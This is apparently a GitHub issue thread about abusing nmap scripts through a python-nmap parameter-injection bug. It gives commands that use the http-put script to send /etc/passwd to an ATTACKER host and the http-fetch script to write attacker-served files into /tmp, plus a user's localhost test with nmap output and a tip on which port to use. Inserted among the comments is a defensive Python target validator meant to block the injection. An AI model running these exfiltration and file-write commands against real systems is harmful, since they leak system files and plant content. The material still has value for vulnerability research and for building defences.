nmap read/write tricks
s0i37 opened this issue · 3 comments
Hello.
Sorry, I don't have enough time to create a pull request.
I want to suggest a few tricks that helped me with exploiting "https://bitbucket.org/xael/python-nmap/issues/51/security-issue-nmap-parameter-injection" without direct access to the file system.
arbitrary file read
nc -nv -lp 80
nmap ATTACKER --script http-put --script-args http-put.url='/',http-put.file='/etc/passwd'
arbitrary file write
php -S 0.0.0.0:80 -t . router_with_directory_listing.php
nmap ATTACKER -sV --script http-fetch --script-args 'destination=/tmp/'
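A defensive counterpart to the tricks above, added here as an example that is not code from this issue or from python-nmap: a target validator that a wrapper can run before handing user-supplied hosts to nmap, so a value such as `ATTACKER --script http-put ...` is rejected instead of being split into extra nmap arguments. The `build_nmap_argv` helper, its fixed `-oX -` flag and the assumption that the wrapper invokes nmap via subprocess without a shell are my own.

```python
import ipaddress
import re

# Hostname label rule (RFC 1123 style): letters, digits and hyphens,
# 1-63 characters, no leading or trailing hyphen.
_LABEL = re.compile(r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)$")


def is_safe_target(target: str) -> bool:
    """Return True only if `target` is a single IP, CIDR network or hostname.

    Anything nmap could parse as an option (leading '-'), anything containing
    whitespace (which the python-nmap bug turns into separate arguments), and
    anything outside the IP/hostname character set is rejected.
    """
    if not target or len(target) > 253:
        return False
    if target.startswith("-"):
        return False
    if any(ch.isspace() for ch in target):
        return False
    # IPv4/IPv6 address or network
    try:
        ipaddress.ip_network(target, strict=False)
        return True
    except ValueError:
        pass
    # Hostname: dot-separated labels, optional trailing dot
    labels = target.rstrip(".").split(".")
    return all(_LABEL.match(label) for label in labels)


def build_nmap_argv(targets, ports=None):
    """Build an argv list for subprocess.run (no shell), refusing unsafe input.

    Assumed wrapper behaviour: XML on stdout (-oX -), optional -p port spec,
    targets always last so they can never be interpreted as options.
    """
    bad = [t for t in targets if not is_safe_target(t)]
    if bad:
        raise ValueError(f"refusing to scan suspicious target(s): {bad}")
    argv = ["nmap", "-oX", "-"]
    if ports is not None:
        if not re.fullmatch(r"[0-9,\-]+", ports):
            raise ValueError("ports must contain only digits, commas and dashes")
        argv += ["-p", ports]
    return argv + list(targets)
```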
I'm having a hard time getting these to work; all I get is a successful scan but no HTTP traffic.
In terminal A (no output):
$ socat -v tcp-listen:1234,reuseaddr,fork -
In terminal B:
$ nmap -p 1234 127.0.0.1 --script http-put --script-args http-put.url='/',http-put.file='/etc/passwd'
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-28 13:17 CEST
Nmap scan report for localhost (127.0.0.1)
Host is up (0.00013s latency).
PORT STATE SERVICE
1234/tcp open hotline
Nmap done: 1 IP address (1 host up) scanned in 0.30 seconds
This happens because nmap isn't sure that 1234 is a web port. Usually some NSE scripts require service type determination.
I suggest you use port 8080, because nmap treats it as a web port by default, like 80.
This sucks... but that was the reason, thanks.